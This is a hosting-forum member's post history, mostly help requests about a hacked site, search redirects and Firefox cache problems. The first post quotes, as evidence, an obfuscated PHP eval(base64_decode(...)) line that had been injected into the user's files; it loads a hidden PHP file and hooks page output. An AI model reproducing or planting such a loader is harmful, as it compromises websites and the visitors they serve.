Jump to content

slick

Members
  • Content Count

    57
  • Joined

  • Last visited

Posts posted by slick

  1. Several files on my hosting account have been edited without my permission.

    Some code has been inserted at the top.

     

    ><?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3RyaW5pdGsvcHVibGljX2h0bWwvdjEvbW9kdWxlcy9Gb3J1bXMvdGVtcGxhdGVzL3N1YlNpbHZlci9pbWFnZXMvbGFuZ19lbmdsaXNoL2NvcHBlci5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

     

    The file permission is 644.

    I don't understand how this could happen but it's like almost half the files on my account have been hacked.

     

    Is there any easy way to change them back to how they were before?

     

    The attack occured on December 17th 2009.

    21:00 server time.

  2. Hi.

     

    I have a website hosted at TCH.

    The domain name is trini-chat dot com.

     

    I've noticed lately that sometimes when I do a search for my site on Google and I click on the link it goes directly to another domain (http://europpc dot com/search.php?iw=1&links=trini+chat) and then that redirects to another site that Firefox deems dangerous.

     

    Any ideas what may be causing this?

     

    Thanks.

  3. Hello.

     

    Since the changeover to the new version of cPanel, I have realized that my .htaccess file is gone.

    The effects of it are still active but it is nowhere to be found.

    The only reason I'm now asking for help on it is because I want to make some changes to it.

     

    Can you all advise me on how to get back my .htaccess file intact?

     

    Thanks.

  4. This is really sad news. I haven't been on the forums for a while.

    Don was a really nice guy. Always helpful and always cheerful.

    He was a welcoming presence on the forums and will be truly missed.

    My condolences go out to the family of Don.

    May he rest in peace and love.

  5. Did you also remove and reinstall Firefox itself?

     

    It's a stumper for sure.

    Guess I didn't phrase that statement too well.

     

    The answer is yes.

     

    First I un-installed Firefox.

    -Removed the default profile manually.

    -Downloaded latest version of Firefox

    -Installed latest version.

    -Started Firefox but got an error (can't remember what it was).

    -Googled it and realized that I had to delete the .ini file too.

    -Finally got Firefox to work.

    -Still got problem.

     

    I know there has to be something wrong with one of these Firefox files that have remained on my computer but I don't know which one it is.

     

    I think my next attempt to fix this problem would be to completely remove every trace of Firefox and then re-install.

     

    Any more advice before I take this drastic step is welcome.

     

    Thanks.

  6. Well it's come down to me having to chose another browser because it seems there's nothing I can do to make this problem go away.

    If you guys ever figure it out please let me know.

    In the mean time I'm using Opera. It's not as good as Firefox IMO but at least it's better than IE.

    I hope that one day someone finds the solution.

    Thanks a lot to everyone who tried to help me.

  7. Well it works normally in IE, but I really don't like to use IE.

     

    I should have mentioned also that not only are the images not loading in Firefox but the page is taking an agonizingly long time to load without the images.

     

    I believe there is something wrong with the cache or temporary files in Firefox but I don't know how to fix it.

     

    Well thanks for the suggestion.

     

    I really hope someone can solve this problem.

     

    Thanks.

  8. Thanks for the suggestions.

     

    I cleared cookies and cache.

     

    The plugins I have installed are ad-block plus, ook video, yet another window resizer and google toolbar.

     

    I've disabled ad-block plus for my domain and still no luck.

     

    Is there something else I can do like maybe clear/delete the cache manually from my hard drive or something?

     

    Thanks.

  9. OK. I got a response which told me to clear browser's cache. I did that but it didn't work.

    I tried another browser (IE) and it worked fine.

     

    So apparently there's something wrong with Firefox's cache.

     

    Does anyone know what I can do to fix this?

     

    I tried clearing the cache a whole bunch of times and refreshing but no luck.

     

    What can I do to make it work in Firefox as I really don't use IE.

  10. I am working on a full disclosure on this event.

     

    For now, I will just say that this issue is fixed.

     

    You should now start seeing 99.9%+ uptime.

     

    I will post a link to my announcement here shortly.

    Glad to hear this.

     

    I was also experiencing a lot of downtime as my site is on dantooine.

     

    It's good to know that the problem is fixed and the 99.9%+ uptime is back.

     

    I'm looking out for the "full disclosure" as I really wanted to know what caused this problem.

  11. Hey everyone.

     

    I was wondering if anyone here ever upgraded PHP-Nuke Platinum to Nuke Evolution?

     

    If you did, what method did you use?

    I see there are 3 different methods that could be used that involve keeping smaller or greater part of your original PNP site intact.

     

    I'd also like to know what level of difficulty you say this procedure is and if there were any bugs/errors that occured that I should know about when doing this.

     

    Thanks alot. :tchrocks:

  12. Hi.

     

    I just have quick question.

     

    In the server status for Disk sda3 (/) I noticed there was a flashing yellow circle whereas in the rest of the rows there is a green circle.

     

    I just wanted to know what was the significance of that and what does "Disk sda3 (/)" mean? ...., if it's not top secret that is :tchrocks:

     

    Thanks.

×
×
  • Create New...